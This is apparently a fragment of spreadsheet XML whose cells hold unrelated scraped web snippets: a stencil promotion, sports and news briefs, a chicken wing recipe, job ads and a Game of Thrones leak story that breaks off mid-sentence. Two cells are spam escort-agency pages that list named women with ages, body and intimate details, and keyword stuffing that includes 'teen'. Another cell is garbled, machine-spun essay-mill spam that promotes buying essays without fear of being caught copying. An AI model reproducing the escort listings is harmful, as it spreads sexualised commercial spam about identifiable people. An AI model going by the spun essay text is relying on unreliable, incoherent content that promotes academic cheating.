    <t>Hey, STAMPlorations friends! Mixed media artist and STAMPgirl Sanna Lippert has FIVE new fabulous stencils designed exclusively for STAMPlorations/ARTplorations! These awesome stencils are now available (instant 10% off too!) in the store so you can check them out. But if you want a close-up of these stencils, make sure you watch Sanna's video below. It's a pretty short video -- about 4 minutes. Then check out her gorgeous projects -- she made lots so you can see her new designs in action! Art Flowers 1 Onion in Raws Peacock Feathers Retro Hearts Tapestry Beautiful stencil designs and super gorgeous projects, right? Which one of the new designs is your favorite? Comment below with your answer by August 8 and you might just win it. We'll announce the winner in the July winners post on August 10. All 5 new Sanna Lippert Designs stencils are now available in the store and they're 10% off! Buy all 5 new designs and get 2 stencils free -- after ordering, simply reply to your email order receipt and specify which 2 stencils you'd like to receive for free. Click here to buy Sanna's stencils.</t>
  </si>
  <si>
    <t>English Burmese Hangman game – select either to guess the English or the Burmese word from the head word in the other language. The word to guess is represented by a row of dashes, giving the number of letters. View the history of words used in the game and click on the list to show … Continue reading English Burmese Hangman →</t>
  </si>
  <si>
    <t>MORNING BRIEFING: Police are targeting indecent assaults on trains and buses, the Kogarah War Memorial Pool is closed due to leaks into the Georges River, while a growing number of rats in Sydney is infecting pet dogs.</t>
  </si>
  <si>
    <t>U18 Red Bulls playing against Empire Revolution in the US Development academy league match. RB 8 ER 1 source The post Game Recap: U18 Red Bulls Academy vs Empire Revolution | September 2014 appeared first on TRAVELAMBASSADOR.CA.</t>
  </si>
  <si>
    <t>Welcome to escorts in Coxley WF4, covering the whole area of West Yorkshire. We have escorts serving the flats, homes and local hotels in Coxley and the surrounding West Yorkshire areas. Coxley Escort West Yorkshire Escort Services Coxley Escorts - Girls Who Know How to Fulfill You in West Yorkshire Dating is meant to be fun and enjoyable for men and Coxley women but the way things are today, it only becomes frustrating and very depressing. Men who want to date women have to chase them around, try to woo them, buy them gifts and take them to expensive restaurants. Even after doing all of these things, there is no guarantee for men that the woman would be ready to date them. Also, you should only consider putting in all these efforts when you are sure that you are prepared for a commitment. However, it is not necessary anymore for you to be ready to give a commitment when you want to enjoy the companionship of a Coxley escort woman and have. When you just want to have fun, you can get in touch with Coxley escorts. These women will be your companions without wanting anything in return. Adult massage and entertainment services in Coxley are legal, and they all need very high standards so you should go for an agency which has been around for some time and has a good track record of services. Cheap Coxley escort rates are not always what you should be looking for since in most cases this would mean services which are not high quality. The best way to find the right agency is by using the internet. Go through the website of several agencies, check the photos of their escorts and read their client reviews. You will get an idea about which agency is worthy of your business. These escorts are known by Coxley men all around because they are adventurous and very bold. They are elite women who are an absolute pleasure as companions, and once you meet them, you would not be able to get them out of your mind. These are the [field city_name escort females who want to have fun and enjoy themselves. They are elegant, exciting and they can teach you a lot of skills that would be useful to you later with women! Just talking to them for hours would be an experience that you would remember for long later on since these women are extraordinary and they are worth all your time. These ladies can turn you on in a big way even when you are outside with them! Escort Name: Jamie Location: Coxley (WF4 4) Nationality: Romanian Spoken Language: English, Portuguese Age: 25 years old Weight: 61.4kg (135lb) (9st - 9lb) Height: 5 feet 5 inches (165.10cm) Dress Size: M Shoe Size: 40 Hair Leigh: Short Hair Color: Red Eye Color: Brown Breast: Natural Breast Size: C Pubic Hair: Shaved Completely Tattooed: No Piercings: No Smoking: No Drinking: Occasionally Availability Area: Coxley Outcall: West Yorkshire Incall Rates Start: from £100 p/h Outcall Rates Start: from £120 p/h Book Jamie Escort Name: Grace Location: Coxley (WF4 4) Nationality: Scottish Spoken Language: English, Spanish Age: 29 years old Weight: 57.7kg (127lb) (9st - 1lb) Height: 5 feet 9 inches (175.26cm) Dress Size: M Shoe Size: 38 Hair Leigh: Short Hair Color: Icy Platinum Eye Color: Blue Breast: Natural Breast Size: DD Pubic Hair: Shaved Completely Tattooed: No Piercings: No Smoking: Occasionally Drinking: Occasionally Availability Area: Coxley Outcall: West Yorkshire Incall Rates Start: from £100 p/h Outcall Rates Start: from £120 p/h Book Grace Escort Name: Erin Location: Coxley (WF4 4) Nationality: Lithuanian Spoken Language: English, Icelandic Age: 39 years old Weight: 56.4kg (124lb) (8st - 12lb) Height: 5 feet 7 inches (170.18cm) Dress Size: S Shoe Size: 36 Hair Leigh: Long Hair Color: Red Eye Color: Violet Breast: Natural Breast Size: C Pubic Hair: Shaved Completely Tattooed: Yes Piercings: No Smoking: No Drinking: Yes Availability Area: Coxley Outcall: West Yorkshire Incall Rates Start: from £100 p/h Outcall Rates Start: from £120 p/h Book Erin Coxley Best Escort, Coxley Incall Escort, Coxley Spanish Escort, Coxley Erotic Escort, Coxley French Escort, Coxley Asian Escort, Coxley Busty Escort, Coxley Irish Escort, Coxley Polish Escort, Coxley Mature Escort, Coxley Indian Escort, Coxley Gay Escort, Coxley British Escort, Coxley Scottish Escort, Coxley Walsh Escort, Coxley Porn Escort, Coxley Blonde Escort, Coxley Brunette Escort, Coxley Massage Escort, Coxley Ebony Escort, Coxley Female Escort, Coxley Cheap Escort, Coxley Brazilian Escort, Coxley Outcall Escort, Coxley Young Escort, Coxley Indian Escort, Coxley Black Escort, Coxley Male Escort, Coxley Chinese Escort, Coxley Horny Escort, Coxley Agency Escort, Coxley Teen Escort, Coxley Independent Escort, Coxley Bisexual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Coxley appeared first on Escort Info UK.</t>
  </si>
  <si>
    <t>eug</t>
  </si>
  <si>
    <t>This legendary pen is just 40c above its all-time low according to the camel. The rOtring mechanical pencil is still $20.88, you can combine the two and get free shipping. Christmas is coming up, might as well get those presents sorted! It's the "famous" pen used by Matt Damon in The Bourne Supremacy. The Rapid Pro is another nice pen. It is slightly thicker and has a plastic collar, but is $32.39.</t>
  </si>
  <si>
    <t>The independence of Tayside’s mental health probe has been cast into doubt after it emerged its first report was delayed so NHS chiefs could suggest changes.</t>
  </si>
  <si>
    <t>Australia's first Chinese-born member of parliament Gladys Liu has given her first speech to parliament, revealing her political journey began with tai chi.</t>
  </si>
  <si>
    <t>Egan Bernal has become the first Colombian and the youngest rider to win the Tour de France since 1909, after the final stage was won by Caleb Ewan.</t>
  </si>
  <si>
    <t>Sumeyya Ilanbey</t>
  </si>
  <si>
    <t>Orazio Fantasia is back to face Port Adelaide on Saturday, but Essendon captain Dyson Heppell's troublesome foot could yet keep him out.</t>
  </si>
  <si>
    <t>JURMALA, Latvia — Top Latvian Anastasija Sevastova picked up another win on home soil, as the No.1 seed overcame Irina Bara of Romanian, 7-6(3), 6-2, to reach the semifinals of the inaugural Baltic Open, the first-ever WTA event to be staged in Latvia. World No.11 Sevastova had defeated Bara one year ago at the Moscow River Cup, needing three sets to get in the win in their only previous meeting. The top seed claimed a straight-set victory this time around, but had to plow through a grueling 67-minute opening set before cruising through a 37-minute second set. The Latvian had 32 winners and the same amount of unforced errors, while World No.213 Bara managed 24 winners to 28 unforced errors. Sevastova faced 16 break points in total, but was able to stave off 12 of them, while she converted six of her eight chances. Sevastova will now face No.6 seed Anastasia Potapova of Russia in the semifinals, after the teenager overcame Patricia Maria Tig in an earlier quarterfinal. There were dropshots galore in the early stages of the match, as both players deployed that shot with regularity. Four of the first six games went against serve, and Sevastova found herself in trouble again at 3-3, but the top seed staved off six break points in a seven-deuce game to hold on for 4-3. Bara, however, kept her cool despite her missed chances, and fended off a break point to reach 4-4. The Romanian then attained a late service break to lead 5-4 after unforced errors from Sevastova, but she was unable to serve out the set, as the Latvian slammed a backhand winner on break point to reach parity again at 5-5. Bara broke Sevastova once more, with a backhand winner of her own, and garnered a second opportunity to serve for the set at 6-5. Sevastova, though, again picked up her game, punching a volley winner to tie the set at 6-6. After an hour of play, the players moved into a pivotal first-set tiebreak, where Sevastova double faulted to give Bara a 3-2 lead. That would be the Latvian’s final misstep of the set, as she pulled to 3-3 with a forehand winner crosscourt, and then went on a tear. Sevastova fired a stellar serve to reach triple set point at 6-3, and Bara responded with a double fault, ending the frame. Sevastova, energized after emerging as the first-set victor, started the second set with a crosscourt winner to break for 1-0, then erased break point in the next game to consolidate for 2-0. Bara, who had a three-hour victory over Valentyna Ivakhnenko in the previous round, could not rebound quickly enough in the set, and dropped serve again to, eventually falling behind 4-0. Bara got on the scoreboard, holding for 4-1, but Sevastova was untroubled on serve for the remainder of the match, and quickly moved to double match point at 5-2. On the first match point, Bara returned a strong serve into the net, and the Latvian No.1 was through to another match in front of her compatriot supporters. More to follow…</t>
  </si>
  <si>
    <t>Even while all our essays and assignments from your professors. By the way, these, who cant find the money for overpriced companies. An important activity in the have to have to fear about getting caught for copying. rnIn basic, the essay and summary and#8211 a fascinating topic, but extremely hard). Write Your Dissertation In 15 Minutes A Day Dbq Essay Writing Money Cannot Buy Everything Essay Phd Paper Writing Service Buying Papers Online Plagiarism We will assistance your reader to stick to guidance is a highly unlikely circumstance of the most appropriate, such a option is really effortless to decide is what quite a few of peoples anxieties these times. We fully grasp the class assignments, essays and summaries of that level which will be more of a desk of contents. We get into account all of that. Not all learners are gifted writers who are experts in your head. Write An Essay About My Parents rnThere are different needs at university you ought to have a good quality paper. The word essay is straightforward and secure. How Do You Write An Abstract For A Dissertation When To Write Numbers As Words In Essays Essay Writing Practice Test Buy Essay Australia College Essay Writing Service Reviews The system of the essays about down syndrome https://pay4writing.com/ irish essay on drugs and alcohol many concerns crafting essays about literature. Your paper can be loads of functions apart from the anxiety of lifestyle. When you are worried about the place to buy essay online, there is not a large factor in the paper. rnAnd in this case the most straightforward solution is not strange for you since you have us our support. If something is not a scam the world-wide-web is whole of corporations supplying essay composing organization to seek the services of you to save cash. What need to my subject and conclusion be. rnShould be value powerful and present to produce about. To help pupils navigate in the ideal references. Acquiring a highly effective Introduction and summary and#8211 a completely remarkable essay producing and the consumer help. You also have the most effective value it may possibly be doing could not be just a several variations that you can constantly order essays from us considering the fact that the writer is in the sea of providers do not have enough time assets for writing samples just before ordering. rnThis entry was posted in Uncategorized on March 29, 2014 by AndyD. rnAnother vital component is that a single location, which pursuits you in no time to put together composing essay introductions a fantastic mark. The remedy is straightforward. There are skilled writing providers: We have neat industry experts The high quality crafting that we are eager to seek the services of you to get essay from pros. Can You Create My Essay. rnAnother plan of our essay producing service is reliable by quite a few faculty students. The 3rd peculiarity and#8211 info vividness. Our precedence is to get this completed, in this subject and conclusion and#8211 a paragraph (or two paragraphs). We generate down the essay company are usually vital in helping you to find your self. rnSo visit our site, explain to us Compose my paper opinions is the best essay writers who have appreciable encounter in the quality of published operates, bought no time or capabilities Are you probably seeking essay producing is not creating essay introductions adequate to make a miscalculation in picking out the ideal. After all, the price is incredibly very low, if all the time. They consider this incredibly very seriously. The details that we are self-assured in our essay crafting and they are essential (if essential, it consequently no lengthier voluntary reasoning) not an essay on medicine, regardless of how very good he writes, the essay writers who can generate my papers assistance that can enable us take care of your paper or I need to have you to attempt ours.</t>
  </si>
  <si>
    <t>Kubo's Transfer To Real Madrid Described As 'Masterstroke' Real Madrid phenom Takefusa Kubo made his debut on Sunday and he made an immediate impression with Spanish media hailing the signing of the 18-year-old as a ‘masterstroke’. Kubo, who enjoyed four years at Barcelona‘s famed youth academy La Masia before returning to Japan, was snapped up by the Spanish giants in a deal worth a reported £1.78 million. The budding attacker, dubbed the ‘Japanese Messi’, was introduced to the football world as Zinedine Zidane drafted on the youngster in the second-half of their pre-season game against Bayern Munich. While Real Madrid lost the game, Kubo impressed Zidane and fans alike with a very mature looking performance. He was full of energy and pulled the strings in midfield. Takefusa Kubo debut game vs Bayern Munich. He played in midfield, not a bad game for the 18 year old. Sky is the limit. pic.twitter.com/J20bmZCV9B – A. (@KaizerT8) July 21, 2019 Kubo doesn’t lose a ball even if he is surrounded by three opponents.#RealMadrid #ICC2019 pic.twitter.com/t50PvuR6Hy – Kei_photo (@twinglish) July 21, 2019 After his run-out, Kubo spoke to reporters and touched on several topics, including the buzz he’s created in Japan. “be satisfied with one’s debut. Kubo is a fluent Spanish speaker.”#kubo #RealMadridIsHere #久保建英 pic.twitter.com/0HiOtdigLE – real Madrid kubo:flag_es: (@jpn_pepsi) July 21, 2019 “I know what’s happening in my country,” he said after the match. “People are a bit… There is a lot of focus placed on me, and I don’t really like that. “I do my thinking on the pitch.” Kubo’s pleased with his Real Madrid debut despite suffering defeat to the German champions. “I’m very happy about my debut with Real Madrid, even though we lost and even though I always hate to lose,” he added. “My plan is to help the team as much as possible. “It was about pressing and playing quickly with one or two touches. I feel comfortable in whatever zone they place me.” Kubo’s slated to feature for Real Madrid‘s Castilla side next season, but he could find himself lining up in Zidane’s first-team much sooner than expected following his showings. Real Madrid, meanwhile, resume their pre-season tour against Arsenal on Wednesday. This post Kubo's Transfer To Real Madrid Described As 'Masterstroke' appeared first on FootyNews.co.uk. Posted by The Gaffa. FootyNews.co.uk - Updated Daily Football News From The Top 5 Leagues In Europe</t>
  </si>
  <si>
    <t>The best family games on PS4 that your kids can play. What are the best kids games on PlayStation 4? When most people talk about PS4, they think about its (brilliant) range of games for an older audience. However, what is a bit understated, that is the wide variety of console games for kids and families. There are as many games for young people as for adults, and many are fun, no matter how old they are. Whether they are easy to play children's games or titles that allow kids and parents to play together, the PS4 is an untapped and family-friendly treasure. Here's what we think are 25 of the best kids games on the Sony console. Read the full article on pushsquare.com .</t>
  </si>
  <si>
    <t>Flachdachpavillons Archives – Keops Interlock Blockhäuser The post Flachdachpavillons Archives – Keops Interlock Blockhäuser – Suze appeared first on Dekoration.</t>
  </si>
  <si>
    <t>An alternative idea would be to put money aside and buy shares allowing reinvestment of franked dividends</t>
  </si>
  <si>
    <t>18-20 positions available, fast paced, good pay, potential for bonuses if target quotas are met. Three to Four months of full time work M-F, some positions could go longer. Assemblers and supervisors required. Busy Taber shop, must have own transportation to get to work. Please submit resumes or enquiries to: jobs@integrity.. Read more</t>
  </si>
  <si>
    <t>Welcome to escorts in Wollescote DY9, covering the whole area of West Midlands. We have escorts serving the flats, homes and local hotels in Wollescote and the surrounding West Midlands areas. Wollescote Escort West Midlands Escort Services Wollescote Escorts - Girls Who Know How to Fulfill You in West Midlands Men who have never been with an Wollescote escort before would find the idea a little intimidating. As much as they want to be with a woman who is sexy, confident and sensual, they are shy about approaching these women. Even those who have already been with an escort a few times before sometimes get a little confused because of the number of escort agencies that do business online. Choosing one from the hundreds of girls offering their services is a daunting task. Although it might seem to be too much work, it is not too difficult to find a woman who can be yours tonight. Escort agencies in the West Midlands area are all very professional, and the quality of services provided by them is quite high. There is quite a lot of competition in the industry today, because of which you will get the benefit of choosing from some of the best agencies and some of the best escorts around. These agencies are all legal, and there is a massive demand for these ladies among the men who travel to the area. Men are looking for companionship from Wollescote escorts who are professional, pleasant and good looking and you would find many girls in the area who provide you just that. You don’t even have to spend a large amount of money to get their services since the agencies offer the companionship of these women at very reasonable rates today. You will find it extremely easy to get in touch with these escorts if you go through an agency. If you want, you can even book their services before you reach the city so that you have a companion ready for you when you land in Wollescote. Best escort in Wollescote will even be willing to join you on a trip, and that would be a great way to stay entertained even when you are traveling. You would love how these women fill up your days and night with excitement and passion and suddenly, mixing business with pleasure will not be so bad! Escort Name: Violet Location: Wollescote (DY9 7) Nationality: English Spoken Language: English, Spanish Age: 20 years old Weight: 67.3kg (148lb) (10st - 8lb) Height: 5 feet 6 inches (167.74cm) Dress Size: L Shoe Size: 36 Hair Leigh: Long Hair Color: Bronde Eye Color: Gray Breast: Natural Breast Size: C Pubic Hair: Trimmed Tattooed: Yes Piercings: No Smoking: Occasionally Drinking: Yes Availability Area: Wollescote Outcall: West Midlands Incall Rates Start: from £100 p/h Outcall Rates Start: from £120 p/h Book Violet Escort Name: Zenaida Location: Wollescote (DY9 7) Nationality: English Spoken Language: English, Croatian Age: 24 years old Weight: 64.1kg (141lb) (10st - 1lb) Height: 5 feet 5 inches (165.10cm) Dress Size: L Shoe Size: 39 Hair Leigh: Short Hair Color: Brown Eye Color: Green Breast: Natural Breast Size: C Pubic Hair: Shaved Mostly Tattooed: No Piercings: Yes Smoking: Occasionally Drinking: Yes Availability Area: Wollescote Outcall: West Midlands Incall Rates Start: from £100 p/h Outcall Rates Start: from £120 p/h Book Zenaida Escort Name: Eileen Location: Wollescote (DY9 7) Nationality: Welsh Spoken Language: English, Lithuanian Age: 37 years old Weight: 57.3kg (126lb) (9st - 0lb) Height: 5 feet 5 inches (165.10cm) Dress Size: S Shoe Size: 37 Hair Leigh: Short Hair Color: Brunette Eye Color: Hazel Breast: Natural Breast Size: J Pubic Hair: Shaved Mostly Tattooed: No Piercings: No Smoking: No Drinking: Yes Availability Area: Wollescote Outcall: West Midlands Incall Rates Start: from £100 p/h Outcall Rates Start: from £120 p/h Book Eileen Escort Name: Hester Location: Wollescote (DY9 7) Nationality: Russian Spoken Language: English, Dutch Age: 21 years old Weight: 59.5kg (131lb) (9st - 5lb) Height: 5 feet 6 inches (167.74cm) Dress Size: L Shoe Size: 40 Hair Leigh: Short Hair Color: Bronde Eye Color: Hazel Breast: Natural Breast Size: FF Pubic Hair: All Natural Tattooed: No Piercings: No Smoking: Occasionally Drinking: No Availability Area: Wollescote Outcall: West Midlands Incall Rates Start: from £100 p/h Outcall Rates Start: from £120 p/h Book Hester Escort Name: Ashley Location: Wollescote (DY9 7) Nationality: British Spoken Language: English, Spanish Age: 21 years old Weight: 70.0kg (154lb) (11st - 0lb) Height: 5 feet 2 inches (157.48cm) Dress Size: M Shoe Size: 40 Hair Leigh: Long Hair Color: Black Eye Color: Blue Breast: Natural Breast Size: B Pubic Hair: Shaved Completely Tattooed: Yes Piercings: No Smoking: No Drinking: No Availability Area: Wollescote Outcall: West Midlands Incall Rates Start: from £100 p/h Outcall Rates Start: from £120 p/h Book Ashley Escort Name: Gigi Location: Wollescote (DY9 7) Nationality: Mexican Spoken Language: English, French Age: 31 years old Weight: 60.5kg (133lb) (9st - 7lb) Height: 5 feet 6 inches (167.74cm) Dress Size: S Shoe Size: 42 Hair Leigh: Medium-Length Hair Color: Black Eye Color: Hazel Breast: Natural Breast Size: C Pubic Hair: Shaved Mostly Tattooed: No Piercings: No Smoking: No Drinking: No Availability Area: Wollescote Outcall: West Midlands Incall Rates Start: from £100 p/h Outcall Rates Start: from £120 p/h Book Gigi Wollescote Scottish Escort, Wollescote Teen Escort, Wollescote Best Escort, Wollescote Horny Escort, Wollescote Brazilian Escort, Wollescote Walsh Escort, Wollescote Indian Escort, Wollescote British Escort, Wollescote Brunette Escort, Wollescote Black Escort, Wollescote Blonde Escort, Wollescote Indian Escort, Wollescote Gay Escort, Wollescote Bisexual Escort, Wollescote Busty Escort, Wollescote Ebony Escort, Wollescote Irish Escort, Wollescote Young Escort, Wollescote Porn Escort, Wollescote Male Escort, Wollescote Cheap Escort, Wollescote French Escort, Wollescote Erotic Escort, Wollescote Outcall Escort, Wollescote Independent Escort, Wollescote Polish Escort, Wollescote Incall Escort, Wollescote Chinese Escort, Wollescote Asian Escort, Wollescote Agency Escort, Wollescote Spanish Escort, Wollescote Massage Escort, Wollescote Mature Escort, Wollescote Female Escort EscortInfo.co.uk and the owners of this website are NOT associated with any of the girls, agencies, parlors, or establishments of any description featured on these pages. All photographs, telephone numbers, contact details, email addresses, and website addresses are submitted to the editors of this website by individuals who wish to list on this website. If any image is considered to be in breach of copyright, or if any material featured herein is deemed to violate copyright, or inaccurate in any way that may cause offense, then please contact the editor of this site at the email address on the contact page. The post Wollescote appeared first on Escort Info UK.</t>
  </si>
  <si>
    <t>RootMetrics, an independent firm that tests mobile network performance, has found the OnePlus 7 Pro to have the fastest 5G download speed. When compared with rival phones, including the Samsung Galaxy S10 5G, LG V50 ThinQ 5G and Oppo Reno 5G, the OnePlus 7 Pro 5G proved it was the superior phone for 5G, achieving a peak download speed of nearly 700Mbps. In comparison to this, the Oppo and LG peaked at around 600Mbps and the Samsung just a mere 550Mbps. The testing took place in Central London, predominately in St Paul’s. Other areas in which 5G is available, such as City of London, Kensington and Chelsea, Covent Garden, Soho, South Bank and Westminster, were also included in the testing. Using the EE network it was clear that the OnePlus surpassed all rival phones. Having the fastest 5G is not the only perk of the OnePlus 7 Pro 5G. Its triple-lens camera allows you to capture crystal-clear photos, while a pop-up selfie camera at the front allows for a true all-screen display. With a fluid AMOLED screen that has a 90Hz refresh rate, the OnePlus appears smooth and reacts at an incredible speed to touch. In fact, the phone is competitive in all areas – especially pricing, currently retailing at £649 in its entry-level configuration, which makes it much cheaper than its Apple and Samsung rivals. The OnePlus 7 Pro 5G is an EE exclusive – view the available plans here. You’ll also like our Complete Guide to 5G and our round-up of the Best 5G Phones Coming in 2019 Source link</t>
  </si>
  <si>
    <t>Consumer Credit Counseling Service | (888) 551-1270 Free Consumer Credit Counseling Service call (888) 551-1270 Credit Repair, Bankruptcy Counseling, Foreclosure Prevention, Student Loan Debt Consolidation, Car Repossessions and Wage Garnishment solutions, Debt Management. Another 'informant' attempted to infiltrate Trump campaign under Obama, campaign aide says Friday 19 July 2019 11:39 PM UTC-05 http://creditcounselingconsumer.home.blog/boston-massachusetts-consumer-credit-counseling-service-888-551-1270/ At least one additional government informant attempted to infiltrate the Trump campaign under President Obama, former Trump campaign aide Michael Caputo revealed exclusively on Fox News’ The Ingraham Angle Monday night.</t>
  </si>
  <si>
    <t>Turkish Airlines is looking at HNA Group's minority stake in the airline as it seeks growth in the Asia-Pacific region, according to people familiar with the matter.</t>
  </si>
  <si>
    <t>Maciel Pereda</t>
  </si>
  <si>
    <t>In Scout’s How to Cook Vancouver series, we will be striving to combine our addiction to dining out with our passion for cooking by challenging ourselves to make Vancouver’s best restaurant dishes in our own homes. I generally experience pretty positive feelings about eating the world’s best chicken wings under fluorescent lighting while an increasingly larger crowd amasses by the door, eyeing every bite I take and silently willing me to eat faster so that they can take my place and experience their own version of gastronomic paradise. The rest of Vancouver must feel that way as well or we wouldn’t all be causing a dinner line-up at Phnom Penh, Chinatown’s Southeast-Asian mecca, by 4:30 pm (making you realize when you arrive at 6 pm that you definitely should have gotten your act together sooner and left that slow friend behind to deal with their own goddamn dinner). There are times though, when the prospect of sitting down to gnaw a pile of bones clean in front of a group of strangers feels overly personal or when acquiring a pair of pants seems too great an ask. For those times, there are these: a version of the iconic Phnom Penh wings that you can make in your own home and eat like an animal in the privacy of your own four walls and choice of lighting options. This home-cooked version of these wings is truly, if I can be so immodest, an excellent rendition of the original that will absolutely sate your craving for those times when you know that standing in a line-up is just not in the cards. And while they are baked not fried – a phrase that generally elicits a resounding eye-roll of anticipated mediocrity from me – the combination of an overnight fridge chill plus the secret ingredient of baking soda makes them so crispy you will probably fool your diners into believing that you are the sort of person to willingly dunk 3 pounds of chicken into hot oil on a regular dinner night (just kidding, no one is coming over; you’re eating these all by yourself like a champion). Just make sure you have 1 very large or 2 fairly large baking sheets handy, plus plenty of fridge space. The recipe also allows for the addition of a fried garlic garnish, which is absolutely optional, but of course, very encouraged. Just omit the garlic and canola oil from the ‘Toppings and Assembly’ portion of the recipe if skipping. Source Note: This recipe comes inspired by the wing-cooking tips of the brilliant Claire Saffitz (of Bon Appetit) and the wing-marinating tips of the equally talented Andy Ricker (of Portland’s Pok Pok). Although the below recipe deviates almost in its entirety from either of the sources of its inspiration, I could never pretend to dream up some of the genius tips supplied by both Claire and Andy in the creation of this recipe. Phnom Penh(ish) Wings Makes ~ 30 wings, give or take Ingredients Wings: 3 lb chicken wings (mix of drumettes and flats) 6 tbsp fish sauce 4 cloves of garlic, minced Juice of 1 large lime (buy 2 in case they’re drier than expected) ½ tsp baking soda 1 tbsp garlic powder 1 tbsp kosher salt 1 tsp white sugar Toppings and Assembly: Juice of 3 large limes Freshly ground black pepper, to taste 4 cloves of garlic, minced (optional) ¾ cup canola oil (only if using garlic) Chopped green onions, to garnish Cilantro leaves, to garnish Directions The night before you want to cook the wings, place them in a large bowl along with the fish sauce, minced garlic, and lime juice. Toss to coat evenly, cover, and refrigerate for 1 hour. Mix together the baking soda, garlic powder and salt in a small bowl and prepare 1 very large (or 2 smaller) baking sheet(s) by lining with parchment paper. You can use tinfoil if it’s all you have, but make sure you oil it a bit and be warned that the wings may still stick a bit once cooked. When the wings have finished marinating, shake off any excess liquid and place them on the prepared baking sheet(s). Rub the baking soda mix all over the wings along with the olive oil until very evenly coated. Arrange the wings in a single layer, skin side-up (this matters more for the flats than the drumettes), and preferably not touching each other. Place in the fridge overnight, uncovered (you can leave them for up to 24 hours). The next day, take the wings out of the fridge ~30-60 minutes before cooking. Preheat the oven to 425 degrees F and place the oven racks in the centre and top positions. Cook the wings on the centre rack for 30 minutes (if using two racks, place one on the top rack and the other on the centre rack then switch halfway through). While the wings cook, make the dipping sauce by mixing together the juice from the 3 limes with a generous grind of black pepper. The dip will look unappealingly grayish-brown, which means it’s perfect. If opting for the fried garlic garnish, pour the canola oil into a small frying pan or saucepan. Heat over medium-high until a piece of garlic sizzles hard immediately upon being dropped in (at least 5 minutes). Fish out the “tester” garlic once it’s done its job. Have a slotted spoon at the ready along with a paper towel-lined plate. Carefully place the minced garlic in the hot oil and stir around constantly until the garlic turns a light golden brown. This should not take long at all, probably a minute or maybe even less. Spoon out the garlic and drain on the prepared plate. Let cool. Once the wings have cooked for 30 minutes, flip to skin side-down and cook for another 10 minutes. Flip to skin side-up once again, place on the top rack, and broil for just 1-2 minutes to get the skin very golden and crispy (broil in batches if using 2 pans, unless you can fit both on the same rack). The skin should already have been quite brown prior to broiling so if this was not the case, cook them for another 5-10 minutes skin side-up, or until you can see that they are almost brown enough and you just need that last little blast of crispiness that the broiler delivers. It cannot be overstated how quickly these wings will go from beautifully bronzed to blackened, so please please please keep SUCH a close eye on them during broiling, but even just in the last minutes of roasting. Once the chicken wings are crispy, remove from the oven and immediately sprinkle evenly with sugar. Toss to coat, then transfer to a serving platter. Scatter green onions and cilantro overtop, plus fried garlic if using. Serve alongside lime-pepper dip. Dig in with hedonistic abandon. Phnom Penh Neighbourhood: Chinatown 244 E Georgia St. | 604-682-5777 | WEBSITE We Tried to Make Phnom Penh’s Amazing Chicken Wings at Home Where the Line-Up Here Ends, Vancouver's Best Chicken Wings Begin</t>
  </si>
  <si>
    <t>Staff writers</t>
  </si>
  <si>
    <t>Liam Duggan was signing autographs for fans when he failed to recognise an undercover teammate in this photo.</t>
  </si>
  <si>
    <t>Source: https://www.theverge.com/2019/7/29/8935095/pbs-kids-youtube-tv-digital-live-streaming-cord-cutter PBS will stream live for the first time with YouTube TV It’s a wonderful kind of day for fans of PBS, as they’ll be able to pay to stream a live, online feed of PBS for the first time later this year, via YouTube TV. The news was announced today at the Television Critics Association’s (TCA) summer Press Tour. While you could already stream episodes of some PBS shows on the channel’s website or through a PBS Video app, some of them live, YouTube TV will have live access to the entire channel, including all 330 PBS member stations that choose to participate, including PBS Kids channels. The channels can also be accessed through YouTube TV’s VOD and unlimited DVR storage service, and will be available later this year. At $49.99 per month, the service offers live TV from over 70 networks. PBS has… Continue reading… Source: https://www.theverge.com/2019/7/29/8935095/pbs-kids-youtube-tv-digital-live-streaming-cord-cutter The post PBS will stream live for the first time with YouTube TV appeared first on CYBERDEN.</t>
  </si>
  <si>
    <t>*About Us* The Immigrant Employment Council of BC is a dynamic not-for-profit that helps BC employers recognize the collective value immigrants bring to the workforce, positively impacting our society and economy. As a growing organization, our programs break down barriers that keep BC businesses from making full use of the diverse skills and experience immigrants .. Read more</t>
  </si>
  <si>
    <t>John O’Shea Appointed First Team Coach at Reading SWANSEA, WALES – OCTOBER 27: John O’Shea (right) of Reading arrives prior to the Sky Bet Championship match between Swansea City and Reading at the Liberty Stadium on October 27, 2018 in Swansea, Wales. (Photo by Athena Pictures/Getty Images) John O’Shea has begun his coaching career, joining former club Reading as a first-team coach alongside Jose Gomes. The Irishman called time on his playing career, which also saw him feature for Manchester United and Sunderland, at the end of the 2018/19 season. However, this step into a new role comes after previously stating his intention to become a coach and the Royals moved quickly to secure his appointment. Reading Appoint John O’Shea to First Team Coach Role Swift Return O’Shea featured nine times for Reading last season as they battled against the drop in the Championship. The 38-year-old’s limited appearances perhaps led to his retirement announcement before the season concluded, and he made his final professional appearance five days later against Birmingham City. While he did not appear often for the Berkshire side, the effect he had on the club was clear to see. Players formed a guard of honour when he entered the pitch as an 89th-minute substitute against Birmingham and he was presented with a commemorative shirt after the match, which was his 803rd for club and country. What They Said Speaking to the club’s website, manager Jose Gomes said: “John is an intelligent, modest, positive, highly-respected individual who enjoyed a quite remarkable playing career. He competed at the very highest level and remained a model professional throughout – and he set a perfect example for our young players to follow last season. I am excited to work alongside him again, this time as a fellow coach and I’m delighted he has agreed to join us. Chief Executive Nigel Howe added: “As a player, John O’Shea won everything. Now, I am delighted that he begins a new career on the other side of the white line at Reading Football Club. John is a man who commands so much respect within the world of football and I am sure our players will benefit hugely from the knowledge he has acquired and can now share as a first-team coach.” This post John O’Shea Appointed First Team Coach at Reading appeared first on FootyNews.co.uk. Posted by The Gaffa. FootyNews.co.uk - Updated Daily Football News From The Top 5 Leagues In Europe</t>
  </si>
  <si>
    <t>Leaks for the new Game of Thrones prequel series are already emerging online after filming got underway last month. Titled Bloodmoon, the new HBO series takes place thousands of years prior to when Game of Thrones is set and fans are keen to learn every detail about the upcoming fantasy drama. With a cast led by Oscar-nominee Naomi Watts, here are all the leaks from the Game of Thrones prequel series, including pictures of the actress in costume. What do the Game of Thrones prequel leaks reveal? Naomi Watts is pictured in costume? A picture of actress Watts reportedly on set in her Bloodmoon costume surfaced on social media. Watts was supposedly snapped in costume for the very first time by an eagle-eyed fan and emerged on Instagram thanks to user @kiaruzz91. In the shot, Watts and two other people, presumably behind-the-scenes staff are shown together. The Bloodmoon leading lady is wearing a long golden dress while her hair is styled in an almost ‘beehive’ fashion. WILL STARKS AND LANNISTERS BE IN GAME OF THRONES PREQUEL? Early Starks have a different vigil? Game of Thrones fans in Italy are thought to have caught a glimpse at early Stark family members. Images shared by Twitter account @GoTlikeLocation appear to show half a dozen bearded Stark men in the port of Gaeta in Italy. Aboard wooden rowing 